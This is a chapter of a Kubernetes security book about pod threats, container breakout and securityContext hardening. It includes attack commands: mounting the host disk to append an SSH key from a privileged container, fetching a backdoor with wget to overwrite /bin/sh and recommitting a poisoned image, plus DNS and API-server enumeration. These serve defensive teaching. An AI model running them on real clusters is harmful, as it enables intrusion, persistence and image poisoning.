Chapter 2. Pod-Level Resources

This chapter concerns the atomic unit of Kubernetes deployment: a pod. Pods run apps, and an app may be one or more containers working together in one or more pods.

We’ll consider what bad things can happen in and around a pod, and look at how you can mitigate the risk of getting attacked.

As with any sensible security effort, we’ll begin by defining a lightweight threat model for your system, identifying the threat actors it defends against, and highlighting the most dangerous threats. This gives you a solid basis to devise countermeasures and controls, and take defensive steps to protect your customer’s valuable data.

We’ll go deep into the security model of a pod and look at what is trusted by default, where we can tighten security with configuration, and what an attacker’s journey looks like.

Threat Model

We define a scope for each threat model. Here, you are threat modeling a pod. Let’s consider a simple group of Kubernetes threats to begin with:

Attacker on the network

Sensitive endpoints (such as the API server) can be attacked easily if public.

Compromised application leads to foothold in container

A compromised application (remote code execution, supply chain compromise) is the start of an attack.

Establish persistence

Stealing credentials or gaining persistence resilient to pod, node, and/or container restarts.

Malicious code execution

Running exploits to pivot or escalate and enumerating endpoints.

Access sensitive data

Reading Secret data from the API server, attached storage, and network-accessible datastores.

Denial of service

Rarely a good use of an attacker’s time. Denial of Wallet and cryptolocking are common variants.

Tip

The threat sources in “Prior Art” have other negative outcomes to cross-reference with this list.

Anatomy of the Attack

captain

Captain Hashjack started their assault on your systems by enumerating BCTL’s DNS subdomains and S3 buckets. These could have offered an easy way into the organization’s systems, but there was nothing easily exploitable on this occasion.

Undeterred, they create an account on the public website and log in, using a web application scanner like zaproxy (OWASP Zed Attack Proxy) to pry into API calls and application code for unexpected responses. They’re on the search for leaking web-server banner and version information (to learn which exploits might succeed) and are generally injecting and fuzzing APIs for poorly handled user input.

This is not a level of scrutiny that your poorly maintained codebase and systems are likely to withstand for long. Attackers may be searching for a needle in a haystack, but only the safest haystack has no needles at all.

Although many parts of an attack can be automated, this is an involved process. A casual attacker is more likely to scan widely for software paths that trigger published CVEs and run automated tools and scripts against large ranges of IPs (such as the ranges advertised by public cloud providers). These are noisy approaches.

Remote Code Execution

If a vulnerability in your application can be used to run untrusted (and in this case, external) code, it is called a remote code execution (RCE). An adversary can use an RCE to spawn a remote control session into the application’s environment: here it is the container handling the network request, but if the RCE manages to pass untrusted input deeper into the system, it may exploit a different process, pod, or cluster.

Your first goal of Kubernetes and pod security should be to prevent RCE, which could be as simple as a kubectl exec, or as complex as a reverse shell, such as the one demonstrated in Figure 2-2.

haku 0202
Figure 2-2. Reverse shell into a Kubernetes pod

Application code changes frequently and may hide undiscovered bugs, so robust application security (AppSec) practices (including IDE and CI/CD integration of tooling and dedicated security requirements as task acceptance criteria) are essential to keep an attacker from compromising the processes running in a pod.

With that, let’s move on to the network aspects.

Network Attack Surface

The greatest attack surface of a Kubernetes cluster is its network interfaces and public-facing pods. Network-facing services such as web servers are the first line of defense in keeping your clusters secure, a topic we will dive into in Chapter 5.

This is because unknown users coming in from across the network can scan network-facing applications for the exploitable signs of RCE. They can use automated network scanners to attempt to exploit known vulnerabilities and input-handling errors in network-facing code. If a process or system can be forced to run in an unexpected way, there is the possibility that it can be compromised through these untested logic paths.

To investigate how an attacker may establish a foothold in a remote system using only the humble, all-powerful Bash shell, see, for example, Chapter 16 of Cybersecurity Ops with bash by Paul Troncone and Carl Albing (O’Reilly).

To defend against this, we must scan containers for operating system and application CVEs in the hope of updating them before they are exploited.

If Captain Hashjack has an RCE into a pod, it’s a foothold to attack your system more deeply from the pod’s network position and permissions set. You should strive to limit what an attacker can do from this position, and customize your security configuration to a workload’s sensitivity. If your controls are too loose, this may be the beginning of an organization-wide breach for your employer, BCTL.

As Dread Pirate Hashjack has just discovered, we have also been running a vulnerable version of the Struts library. This offers an opportunity to start attacking the cluster from within.

As the attack begins, let’s take a look at where the pirates have landed: inside a Kubernetes pod.

Kubernetes Workloads: Apps in a Pod

Multiple cooperating containers can be logically grouped into a single pod, and every container Kubernetes runs must run inside a pod. Sometimes a pod is called a “workload,” which is one of many copies of the same execution environment. Each pod must run on a Node in your Kubernetes cluster as shown in Figure 2-3.

A pod is a single instance of your application, and to scale to demand, many identical pods are used to replicate the application by a workload resource (such as a Deployment, DaemonSet, or StatefulSet).

Your pods may include sidecar containers supporting monitoring, network, and security, and “init” containers for pod bootstrap, enabling you to deploy different application styles. These sidecars are likely to have elevated privileges and be of interest to an adversary.

“Init” containers run in order (first to last) to set up a pod and can make security changes to the namespaces, like Istio’s init container that configures the pod’s iptables (in the kernel’s netfilter) so the runtime (non-init container) pods route traffic through a sidecar container. Sidecars run alongside the primary container in the pod, and all non-init containers in a pod start at the same time.

What’s inside a pod? Cloud native applications are often microservices, web servers, workers, and batch processes. Some pods run one-shot tasks (wrapped with a job, or maybe one single nonrestarting container), perhaps running multiple other pods to assist. All these pods present an opportunity to an attacker. Pods get hacked. Or, more often, a network-facing container process gets hacked.

A pod is a trust boundary encompassing all the containers inside, including their identity and access. There is still separation between pods that you can enhance with policy configuration, but you should consider the entire contents of a pod when threat modeling it.

What’s a Pod?

A pod as depicted in Figure 2-4 is a Kubernetes invention. It’s an environment for multiple containers to run inside. The pod is the smallest deployable unit you can ask Kubernetes to run and all containers in it will be launched on the same node. A pod has its own IP address, can mount in storage, and its namespaces surround the containers created by the container runtime such as containerd or CRI-O.

Example pods
Figure 2-4. Example pods (source: Kubernetes documentation)

A container is a mini-Linux, and its processes are containerized with control groups (cgroups) to limit resource usage and namespaces to limit access. A variety of other controls can be applied to restrict a containerized process’s behavior, as we’ll see in this chapter.

The lifecycle of a pod is controlled by the kubelet, the Kubernetes API server’s deputy, deployed on each node in the cluster to manage and run containers. If the kubelet loses contact with the API server, it will continue to manage its workloads, restarting them if necessary. If the kubelet crashes, the container manager will also keep containers running in case they crash. The kubelet and container manager oversee your workloads.

The kubelet runs pods on worker nodes to instruct the container runtime and configuring network and storage. Each container in a pod is a collection of Linux namespaces, cgroups, capabilities, and Linux Security Modules (LSMs). As the container runtime builds a container, each namespace is created and configured individually before being combined into a container.

Tip

Capabilities are individual switches for “special” root user operations such as changing any file’s permissions, loading modules into the kernel, accessing devices in raw mode (e.g., networks and I/O), BPF and performance monitoring, and every other operation.

The root user has all capabilities, and capabilities can be granted to any process or user (“ambient capabilities”). Excess capability grants may lead to container breakout, as we see later in this chapter.

In Kubernetes, a newly created container is added to the pod by the container runtime, where it shares network and interprocess communication namespaces between pod containers.

Figure 2-5 shows a kubelet running four individual pods on a single node.

The container is the first line of defense against an adversary, and container images should be scanned for CVEs before being run. This simple step reduces the risk of running an outdated or malicious container and informs your risk-based deployment decisions: do you ship to production, or is there an exploitable CVE that needs patching first?

Tip

“Official” container images in public registries have a greater likelihood of being up to date and well-patched, and Docker Hub signs all official images with Notary, as we’ll see in Chapter 4.

Public container registries often host malicious images, so detecting them before production is essential. Figure 2-6 shows how this might happen.

The kubelet attaches pods to a Container Network Interface (CNI). CNI network traffic is treated as layer 4 TCP/IP (although the underlying network technology used by the CNI plug-in may differ), and encryption is the job of the CNI plug-in, the application, a service mesh, or at a minimum, the underlay networking between the nodes. If traffic is unencrypted, it may be sniffed by a compromised pod or node.

Poisoning a public container registry
Figure 2-6. Poisoning a public container registry
Warning

Although starting a malicious container under a correctly configured container runtime is usually safe, there have been attacks against the container bootstrap phase. We examine the /proc/self/exe breakout CVE-2019-5736 later in this chapter.

Pods can also have storage attached by Kubernetes, using the (Container Storage Interface (CSI)), which includes the PersistentVolumeClaim and StorageClass shown in Figure 2-7. In Chapter 6 we will get deeper into the storage aspects.

In Figure 2-7 you can see a view of the control plane and the API server’s central role in the cluster. The API server is responsible for interacting with the cluster datastore (etcd), hosting the cluster’s extensible API surface, and managing the kubelets. If the API server or etcd instance is compromised, the attacker has complete control of the cluster: these are the most sensitive parts of the system.

For performance in larger clusters, the control plane should run on separate infrastructure to etcd, which requires high disk and network I/O to support reasonable response times for its distributed consensus algorithm, Raft.

As the API server is the etcd cluster’s only client, compromise of either effectively roots the cluster: due to the asynchronous scheduling, in Kubernetes the injection of malicious, unscheduled pods into etcd will trigger their scheduling to a kubelet.

As with all fast-moving software, there have been vulnerabilities in most parts of the Kubernetes stack. The only solution to running modern software is a healthy continuous integration infrastructure capable of promptly redeploying vulnerable clusters upon a vulnerability announcement.

Understanding Containers

Okay, so we have a high-level view of a cluster. But at a low level, what is a “container”? It is a microcosm of Linux that gives a process the illusion of a dedicated kernel, network, and userspace. Software trickery fools the process inside your container into believing it is the only process running on the host machine. This is useful for isolation and migration of your existing workloads into Kubernetes.

Note

As Christian Brauner and Stéphane Graber like to say “(Linux) containers are a userspace fiction,” a collection of configurations that present an illusion of isolation to a process inside. Containers emerged from the primordial kernel soup, a child of evolution rather than intelligent design that has been morphed, refined, and coerced into shape so that we now have something usable.

Containers don’t exist as a single API, library, or kernel feature. They are merely the resultant bundling and isolation that’s left over once the kernel has started a collection of namespaces, configured some cgroups and capabilities, added Linux Security Modules like AppArmor and SELinux, and started our precious little process inside.

A container is a process in a special environment with some combination of namespaces either enabled or shared with the host (or other containers). The process comes from a container image, a TAR file containing the container’s root filesystem, its application(s), and any dependencies. When the image is unpacked into a directory on the host and a special filesystem “pivot root” is created, a “container” is constructed around it, and its ENTRYPOINT is run from the filesystem within the container. This is roughly how a container starts, and each container in a pod must go through this process.

Container security has two parts: the contents of the container image, and its runtime configuration and security context. An abstract risk rating of a container can be derived from the number of security primitives it enables and uses safely, avoiding host namespaces, limiting resource use with cgroups, dropping unneeded capabilities, tightening security module configuration for the process’s usage pattern, and minimizing process and filesystem ownership and contents. Kubesec.io rates a pod configuration’s security on how well it enables these features at runtime.

When the kernel detects a network namespace is empty, it will destroy the namespace, removing any IPs allocated to network adapters in it. For a pod with only a single container to hold the network namespace’s IP allocation, a crashed and restarting container would have a new network namespace created and so have a new IP assigned. This rapid churn of IPs would create unnecessary noise for your operators and security monitoring. Kubernetes uses the so-called pause container (see also “Intra-Pod Networking”), to hold the pod’s shared network namespace open in the event of a crash-looping tenant container. From inside a worker node, the companion pause container in each pod looks as follows:

andy@k8s-node-x:~ [0]$ docker ps --format '{{.Image}} {{.Names}}' |
  grep "sublimino-"
busybox k8s_alpine_sublimino-frontend-5cc74f44b8-4z86v_default-0
k8s.gcr.io/pause:3.3 k8s_POD_sublimino-frontend-5cc74f44b8-4z86v-1
...
busybox k8s_alpine_sublimino-microservice-755d97b46b-xqrw9_default_0
k8s.gcr.io/pause:3.3 k8s_POD_sublimino-microservice-755d97b46b-xqrw9_default_1
...
busybox k8s_alpine_sublimino-frontend-5cc74f44b8-hnxz5_default_0
k8s.gcr.io/pause:3.3 k8s_POD_sublimino-frontend-5cc74f44b8-hnxz5_default_1

This pause container is invisible via the Kubernetes API, but visible to the container runtime on the worker node.

Sharing Network and Storage

A group of containers in a pod share a network namespace, so all your containers’ ports are available on the same network adapter to every container in the pod. This gives an attacker in one container of the pod a chance to attack private sockets available on any network interface, including the loopback adapter 127.0.0.1.

Each container runs in a root filesystem from its container image that is not shared between containers. Volumes must be mounted into each container in the pod configuration, but a pod’s volumes may be available to all containers if configured that way, as you saw in Figure 2-4.

Figure 2-8 shows some of the paths inside a container workload that an attacker may be interested in (note the user and time namespaces are not currently in use).

Nested Pod Namespaces
Figure 2-8. Namespaces wrapping the containers in a pod (inspired by Ian Lewis)

The special virtual filesystems listed here are all possible paths of breakout if misconfigured and accessible inside the container: /dev may give access to the host’s devices, /proc can leak process information, or /sys supports functionality like launching new containers.

What’s the Worst That Could Happen?

A CISO is responsible for the organization’s security. Your role as a CISO means you should consider worst-case scenarios, to ensure that you have appropriate defenses and mitigations in place. Attack trees help to model these negative outcomes, and one of the data sources you can use is the threat matrix as shown in Figure 2-9.

Microsoft Kubernetes Threat Matrix
Figure 2-9. Microsoft Kubernetes threat matrix; source: “Secure Containerized Environments with Updated Threat Matrix for Kubernetes”

But there are some threats missing, and the community has added some (thanks to Alcide, and Brad Geesaman and Ian Coldwater again), as shown in Table 2-1.

Table 2-1. Our enhanced Microsoft Kubernetes threat matrix
Initial access (popping a shell pt 1 - prep) Execution (popping a shell pt 2 - exec) Persistence (keeping the shell) Privilege escalation (container breakout) Defense evasion (assuming no IDS) Credential access (juicy creds) Discovery (enumerate possible pivots) Lateral movement (pivot) Command & control (C2 methods) Impact (dangers)

Using cloud credentials: service account keys, impersonation

Exec into container (bypass admission control policy)

Backdoor container (add a reverse shell to local or container registry image)

Privileged container (legitimate escalation to host)

Clear container logs (covering tracks after host breakout)

List K8s Secrets

List K8s API server (nmap, curl)

Access cloud resources (workload identity and cloud integrations)

Dynamic resolution (DNS tunneling)

Data destruction (datastores, files, NAS, ransomware…)

Compromised images in registry (supply chain unpatched or malicious)

BASH/CMD inside container (implant or trojan, RCE/reverse shell, malware, C2, DNS tunneling)

Writable host path mount (host mount breakout)

Cluster admin role binding (untested RBAC)

Delete K8s events (covering tracks after host breakout)

Mount service principal (Azure specific)

Access kubelet API

Container service account (API server)

App protocols (L7 protocols, TLS, …)

Resource hijacking (cryptojacking, malware C2/distribution, open relays, botnet membership)

Application vulnerability (supply chain unpatched or malicious)

Start new container (with malicious payload: persistence, enumeration, observation, escalation)

K8s CronJob (reverse shell on a timer)

Access cloud resources (metadata attack via workload identity)

Connect from proxy server (to cover source IP, external to cluster)

Applications credentials in config files (key material)

Access K8s dashboard (UI requires service account credentials)

Cluster internal networking (attack neighboring pods or systems)

Botnet (k3d, or traditional)

Application DoS

kubeconfig file (exfiltrated, or uploaded to the wrong place)

Application exploit (RCE)

Static pods (reverse shell, shadow API server to read audit-log-only headers)

Pod hostPath mount (logs to container breakout)

Pod/container name similarity (visual evasion, CronJob attack)

Access container service account (RBAC lateral jumps)

Network mapping (nmap, curl)

Access container service account (RBAC lateral jumps)

Node scheduling DoS

Compromise user endpoint (2FA and federating auth mitigate)

SSH server inside container (bad practice)

Injected sidecar containers (malicious mutating webhook)

Node to cluster escalation (stolen credentials, node label rebinding attack)

Dynamic resolution (DNS) (DNS tunneling/exfiltration)

Compromise admission controllers

Instance metadata API (workload identity)

Host writable volume mounts

Service discovery DoS

K8s API server vulnerability (needs CVE and unpatched API server)

Container lifecycle hooks (postStart and preStop events in pod YAML)

Rewrite container lifecycle hooks (postStart and preStop events in pod YAML)

Control plane to cloud escalation (keys in Secrets, cloud or control plane credentials)

Shadow admission control or API server

Compromise K8s Operator (sensitive RBAC)

Access K8s dashboard

PII or IP exfiltration (cluster or cloud datastores, local accounts)

Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise)

Rewrite liveness probes (exec into and reverse shell in container)

Compromise admission controller (reconfigure and bypass to allow blocked image with flag)

Access host filesystem (host mounts)

Access tiller endpoint (Helm v3 negates this)

Container pull rate limit DoS (container registry)

Compromised etcd (missing auth)

Shadow admission control or API server (privileged RBAC, reverse shell)

Compromise K8s Operator (compromise flux and read any Secrets)

Access K8s Operator

SOC/SIEM DoS (event/audit/log rate limit)

K3d botnet (secondary cluster running on compromised nodes)

Container breakout (kernel or runtime vulnerability e.g., DirtyCOW, `/proc/self/exe`, eBPF verifier bugs, Netfilter)

We’ll explore these threats in detail as we progress through the book. But the first threat, and the greatest risk to the isolation model of our systems, is an attacker breaking out of the container itself.

Container Breakout

A cluster admin’s worst fear is a container breakout; that is, a user or process inside a container that can run code outside of the container’s execution environment.

Note

Speaking strictly, a container breakout should exploit the kernel, attacking the code a container is supposed to be constrained by. In the authors’ opinion, any avoidance of isolation mechanisms breaks the contract the container’s maintainer or operator thought they had with the process(es) inside. This means it should be considered equally threatening to the security of the host system and its data, so we define container breakout to include any evasion of isolation.

Container breakouts may occur in various ways:

If the running process is owned by an unprivileged user (that is, one with no root capabilities), many breakouts are not possible. In that case the process or user must gain capabilities with a local privilege escalation inside the container before attempting to break out.

Once this is achieved, a breakout may start with a hostile root-owned process running in a poorly configured container. Access to the root user’s capabilities within a container is the precursor to most escapes: without root (and sometimes CAP_SYS_ADMIN), many breakouts are nullified.

In a container breakout scenario, if the user is root inside the container or has mount capabilities (granted by default under CAP_SYS_ADMIN, which root is granted unless dropped), they can interact with virtual and physical disks mounted into the container. If the container is privileged (which among other things disables masking of kernel paths in /dev), it can see and mount the host filesystem:

# inside a privileged container
root@hack:~ [0]$ ls -lasp /dev/
root@hack:~ [0]$ mount /dev/xvda1 /mnt/

# write into host filesystem's /root/.ssh/ folder
root@hack:~ [0]$ cat MY_PUB_KEY >> /mnt/root/.ssh/authorized_keys

We look at nsenter privileged container breakouts, which escape more elegantly by entering the host’s namespaces, in Chapter 6.

While you should prevent this attack easily by avoiding the root user and privilege mode, and enforcing that with admission control, it’s an indication of just how slim the container security boundary can be if misconfigured.

Warning

An attacker controlling a containerized process may have control of the networking, some or all of the storage, and potentially other containers in the pod. Containers generally assume other containers in the pod are friendly as they share resources, and we can consider the pod as a trust boundary for the processes inside. Init containers are an exception: they complete and shut down before the main containers in the pod start, and as they operate in isolation may have more security sensitivity.

The container and pod isolation model relies on the Linux kernel and container runtime, both of which are generally robust when not misconfigured. Container breakout occurs more often through insecure configuration than kernel exploit, although zero-day kernel vulnerabilities are inevitably devastating to Linux systems without correctly configured LSMs (such as SELinux and AppArmor).

Note

In “Architecting Containerized Apps for Resilience” we explore how the Linux DirtyCOW vulnerability could be used to break out of insecurely configured containers.

Container escape is rarely plain sailing, and any fresh vulnerabilities are often patched shortly after disclosure. Only occasionally does a kernel vulnerability result in an exploitable container breakout, and the opportunity to harden individually containerized processes with LSMs enables defenders to tightly constrain high-risk network-facing processes; it may entail one or more of:

  • Finding a zero-day in the runtime or kernel

  • Exploiting excess privilege and escaping using legitimate commands

  • Evading misconfigured kernel security mechanisms

  • Introspection of other processes or filesystems for alternate escape routes

  • Sniffing network traffic for credentials

  • Attacking the underlying orchestrator or cloud environment

Finding new kernel attacks is hard. Misconfigured security settings, exploiting published CVEs, and social engineering attacks are easier. But it’s important to understand the range of potential threats in order to decide your own risk tolerance.

We’ll go through a step-by-step security feature exploration to see a range of ways in which your systems may be attacked in Appendix A.

For more information on how the Kubernetes project manages CVEs, see Anne Bertucio and CJ Cullen’s blog post, “Exploring Container Security: Vulnerability Management in Open-Source Kubernetes”.

Pod Configuration and Threats

We’ve spoken generally about various parts of a pod, so let’s finish off by going into depth on a pod spec to call out any gotchas or potential footguns.

For the purpose of this example, we are using a frontend pod from the GoogleCloudPlatform/microservices-demo application, and it was deployed with the following command:

kubectl create -f \
"https://raw.githubusercontent.com/GoogleCloudPlatform/\
microservices-demo/master/release/kubernetes-manifests.yaml"

We have updated and added some extra configuration where relevant for demonstration purposes and will progress through these in the following sections.

Pod Header

The pod header is the standard header of all Kubernetes resources we know and love, defining the type of entity this YAML defines, and its version:

apiVersion: v1
kind: Pod

Metadata and annotations may contain sensitive information like IP addresses or security hints (in this case, for Istio), although this is only useful if the attacker has read-only access:

metadata:
  annotations:
    seccomp.security.alpha.kubernetes.io/pod: runtime/default
    cni.projectcalico.org/podIP: 192.168.155.130/32
    cni.projectcalico.org/podIPs: 192.168.155.130/32
    sidecar.istio.io/rewriteAppHTTPProbers: "true"

It also historically holds the seccomp, AppArmor, and SELinux policies:

metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: "localhost/\
      k8s-apparmor-example-deny-write"

We look at how to use these annotations in “Runtime Policies”.

Let’s move on to a part of the pod spec that is not writable by the client but contains some important hints.

Container Images

The container image’s filesystem is of paramount importance, as it may hold vulnerabilities that assist in privilege escalation. If you’re not patching regularly, Captain Hashjack might get the same image from a public registry to scan it for vulnerabilities they may be able to exploit. Knowing what binaries and files are available also enables attack planning “offline,” so adversaries can be more stealthy and targeted when attacking the live system.

Here we see an image referenced by label, which means we can’t tell what the actual SHA256 hash digest of the container image is. The container tag could have been updated since this deployment as it’s not referenced by digest:

  image: gcr.io/google-samples/microservices-demo/frontend:v0.2.3

Instead of using image tags, we can use the SHA256 image digests to pull the image by its content address:

  image: gcr.io/google-samples/microservices-demo/frontend@sha256:ca5d97b6cec...

Images should always be referenced by SHA256 or use signed tags; otherwise, it’s impossible to know what’s running as the label may have been updated in the registry since the container start. You can validate what’s being run by inspecting the running container for its image’s SHA256.

It’s possible to specify both a tag and an SHA256 digest in a Kubernetes image: key, in which case the tag is ignored and the image is retrieved by digest. This leads to potentially confusing image definitions including a tag and SHA256 such as the following being retrieved as the image matching the SHA rather than the tag:

controlplane/bizcard:latest\ 1
@sha256:649f3a84b95ee84c86d70d50f42c6d43ce98099c927f49542c1eb85093953875 2
1

Container name, plus the ignored “latest” tag

2

Image SHA256, which overrides the “latest” tag defined in the previous line

being retrieved as the image matching the SHA rather than the tag.

If an attacker can influence the local kubelet image cache, they can add malicious code to an image and relabel it on the worker node (note: to run this again, don’t forget to remove the cidfile):

$ docker run -it --cidfile=cidfile --entrypoint /bin/busybox \
  gcr.io/google-samples/microservices-demo/frontend:v0.2.3 \
  wget https://securi.fyi/b4shd00r -O /bin/sh 1

$ docker commit $(<cidfile) \
  gcr.io/google-samples/microservices-demo/frontend:v0.2.3 2
1

Load a malicious shell backdoor and overwrite the container’s default command (/bin/sh).

2

Commit the changed container using the same.

While the compromise of a local registry cache may lead to this attack, container cache access probably comes by rooting the node, and so this may be the least of your worries.

This attack on a local image cache can be mitigated with an image pull policy of Always, which will ensure the local tag matches what’s defined in the registry it’s pulled from. This is important and you should always be mindful of this setting:

  imagePullPolicy: Always

Typos in container image names, or registry names, will deploy unexpected code if an adversary has “typosquatted” the image with a malicious container.

This can be difficult to detect when only a single character changes—for example, controlplan/hack instead of controlplane/hack. Tools like Notary protect against this by checking for valid signatures from trusted parties. If a TLS-intercepting middleware box intercepts and rewrites an image tag, a spoofed image may be deployed.

Again, TUF and Notary side-channel signing mitigates against this, as do other container signing approaches like cosign, as discussed in Chapter 4.

DNS

By default Kubernetes DNS servers provide all records for services across the cluster, preventing namespace segregation unless deployed individually per-namespace or domain.

The default Kubernetes CoreDNS installation leaks information about its services, and offers an attacker a view of all possible network endpoints (see Figure 2-10). Of course they may not all be accessible due to a network policy in place, as we will see in “Traffic Flow Control”.

DNS enumeration can be performed against a default, unrestricted CoreDNS installation. To retrieve all services in the cluster namespace (output edited to fit):

root@hack-3-fc58fe02:/ [0]# dig +noall +answer \
  srv any.any.svc.cluster.local |
  sort --human-numeric-sort --key 7

any.any.svc.cluster.local. 30 IN SRV 0 6 53 kube-dns.kube-system.svc.cluster...
any.any.svc.cluster.local. 30 IN SRV 0 6 80 frontend-external.default.svc.clu...
any.any.svc.cluster.local. 30 IN SRV 0 6 80 frontend.default.svc.cluster.local.
...
tweet-rory-hard-dns
Figure 2-10. The wisdom of Rory McCune on the difficulties of hard multitenancy

For all service endpoints and names do the following (output edited to fit):

root@hack-3-fc58fe02:/ [0]# dig +noall +answer \
  srv any.any.any.svc.cluster.local |
  sort --human-numeric-sort --key 7

any.any.any.svc.cluster.local. 30 IN SRV 0 3 53 192-168-155-129.kube-dns.kube...
any.any.any.svc.cluster.local. 30 IN SRV 0 3 53 192-168-156-130.kube-dns.kube...
any.any.any.svc.cluster.local. 30 IN SRV 0 3 3550 192-168-156-133.productcata...
...

To return an IPv4 address based on the query:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer 1-3-3-7.default.pod.cluster.local

1-3-3-7.default.pod.cluster.local. 23 IN A      1.3.3.7

The Kubernetes API server service IP information is mounted into the pod’s environment by default:

root@test-pd:~ [0]# env | grep KUBE
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.7.240.1
KUBERNETES_SERVICE_HOST=10.7.240.1
KUBERNETES_PORT=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PORT=443

root@test-pd:~ [0]# curl -k \
  https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/version

{
  "major": "1",
  "minor": "19+",
  "gitVersion": "v1.19.9-gke.1900",
  "gitCommit": "008fd38bf3dc201bebdd4fe26edf9bf87478309a",
# ...

The response matches the API server’s /version endpoint.

Tip

You can detect Kubernetes API servers with this nmap script and the following function:

nmap-kube-apiserver() {
    local REGEX="major.*gitVersion.*buildDate"
    local ARGS="${@:-$(kubectl config view --minify |
        awk '/server:/{print $2}' |
        sed -E -e 's,^https?://,,' -e 's,:, -p ,g')}"

    nmap \
        --open \
        --script=http-get \
        --script-args "\
            http-get.path=/version, \
            http-get.match="${REGEX}", \
            http-get.showResponse, \
            http-get.forceTls \
        " \
        ${ARGS}
}

Next up is an important runtime policy piece: the securityContext, initially introduced by Red Hat.

Pod securityContext

This pod is running with an empty securityContext, which means that without admission controllers mutating the configuration at deployment time, the container can run a root-owned process and has all capabilities available to it:

  securityContext: {}

Exploiting the capability landscape involves an understanding of the kernel’s flags, and Stefano Lanaro’s guide provides a comprehensive overview.

Different capabilities may have particular impact on a system, and CAP_SYS_ADMIN and CAP_BPF are particularly enticing to an attacker. Notable capabilities you should be cautious about granting include:

CAP_DAC_OVERRIDE, CAP_CHOWN, CAP_DAC_READ_SEARCH, CAP_FORMER, CAP_SETFCAP

Bypass filesystem permissions

CAP_SETUID, CAP_SETGID

Become the root user

CAP_NET_RAW

Read network traffic

CAP_SYS_ADMIN

Filesystem mount permission

CAP_SYS_PTRACE

All-powerful debugging of other processes

CAP_SYS_MODULE

Load kernel modules to bypass controls

CAP_PERFMON, CAP_BPF

Access deep-hooking BPF systems

These are the precursors for many container breakouts. As Brad Geesaman points out in Figure 2-11, processes want to be free! And an adversary will take advantage of anything within the pod they can use to escape.

haku 0212
Figure 2-11. Brad Geesaman’s evocative container freedom cry

These are some container breakouts requiring root and/or CAP_SYS_ADMIN, CAP_NET_RAW, CAP_BPF, or CAP_SYS_MODULE to function:

When there’s no breakout, root capabilities are still required for a number of other attacks, such as CVE-2020-10749 which are Kubernetes CNI plug-in person-in-the-middle (PitM) attacks via IPv6 rogue router advertisements.

Tip

The excellent “A Compendium of Container Escapes” goes into more detail on some of these attacks.

We enumerate the options available in a securityContext for a pod to defend itself from hostile containers in “Runtime Policies”.

Pod Service Accounts

Service Accounts are JSON Web Tokens (JWTs) and are used by a pod for authentication and authorization to the API server. The default service account shouldn’t be given any permissions, and by default comes with no authorization.

A pod’s serviceAccount configuration defines its access privileges with the API server; see “Service accounts” for the details. The service account is mounted into all pod replicas, and which share the single “workload identity”:

  serviceAccount: default
  serviceAccountName: default

Segregating duty in this way reduces the blast radius if a pod is compromised: limiting an attacker post-intrusion is a primary goal of policy controls.

Using the securityContext Correctly

A pod is more likely to be compromised if a securityContext is not configured, or is too permissive. The securityContext is your most effective tool to prevent container breakout.

After gaining an RCE into a running pod, the securityContext is the first line of defensive configuration you have available. It has access to kernel switches that can be set individually. Additional Linux Security Modules can be configured with fine-grained policies that prevent hostile applications taking advantage of your systems.

Docker’s containerd has a default seccomp profile that has prevented some zero-day attacks against the container runtime by blocking system calls in the kernel. From Kubernetes v1.22 you should enable this by default for all runtimes with the --seccomp-default kubelet flag. In some cases workloads may not run with the default profile: observability or security tools may require low-level kernel access. These workloads should have custom seccomp profiles written (rather than resorting to running them Unconfined, which allows any system call).

Here’s an example of a fine-grained seccomp profile loaded from the host’s filesystem under /var/lib/kubelet/seccomp:

  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: profiles/fine-grained.json

seccomp is for system calls, but SELinux and AppArmor can monitor and enforce policy in userspace too, protecting files, directories, and devices.

SELinux configuration is able to block most container breakouts (excluding with a label-based approach to filesystem and process access) as it doesn’t allow containers to write anywhere but their own filesystem, nor to read other directories, and comes enabled on OpenShift and Red Hat Linuxes.

AppArmor can similarly monitor and prevent many attacks in Debian-derived Linuxes. If AppArmor is enabled, then cat /sys/module/apparmor/parameters/enabled returns Y, and it can be used in pod definitions:

annotations:
  container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write

The privileged flag was quoted as being “the most dangerous flag in the history of computing” by Liz Rice, but why are privileged containers so dangerous? Because they leave the process namespace enabled to give the illusion of containerization, but actually disable all security features.

“Privileged” is a specific securityContext configuration: all but the process namespace is disabled, virtual filesystems are unmasked, LSMs are disabled, and all capabilities are granted.

Running as a nonroot user without capabilities, and setting AllowPrivilegeEscalation to false provides a robust protection against many privilege escalations:

spec:
  containers:
  - image: controlplane/hack
    securityContext:
      allowPrivilegeEscalation: false

The granularity of security contexts means each property of the configuration must be tested to ensure it is not set: as a defender by configuring admission control and testing YAML or as an attacker with a dynamic test (or amicontained) at runtime.

Tip

We explore how to detect privileges inside a container later in this chapter.

Sharing namespaces with the host also reduces the isolation of the container and opens it to greater potential risk. Any mounted filesystems effectively add to the mount namespace.

Ensure your pods’ securityContexts are correct and your systems will be safer against known attacks.

Hardened securityContext

The NSA published “Kubernetes Hardening Guidance”, which recommends a hardened set of securityContext standards. It recommends scanning for vulnerabilities and misconfigurations, least privilege, good RBAC and IAM, network firewalling and encryption, and “to periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied.”

Assigning least privilege to a container in a pod is the responsibility of the securityContext (see details in Table 2-2). Note that the PodSecurityPolicy resource discussed in “Runtime Policies” maps onto the config flags available in securityContext.

Table 2-2. securityContext fields
Field name(s) Usage Recommendations

privileged

Controls whether pods can run privileged containers.

Set to false.

hostPID, hostIPC

Controls whether containers can share host process namespaces.

Set to false.

hostNetwork

Controls whether containers can use the host network.

Set to false.

allowedHostPaths

Limits containers to specific paths of the host filesystem.

Use a “dummy” path name (such as /foo marked as read-only). Omitting this field results in no admission restrictions being placed on containers.

readOnlyRootFilesystem

Requires the use of a read only root filesystem.

Set to true when possible.

runAsUser, runAsGroup, supplementalGroups, fsGroup

Controls whether container applications can run with root privileges or with root group membership.

Set runAsUser to MustRunAsNonRoot.

Set runAsGroup to nonzero.

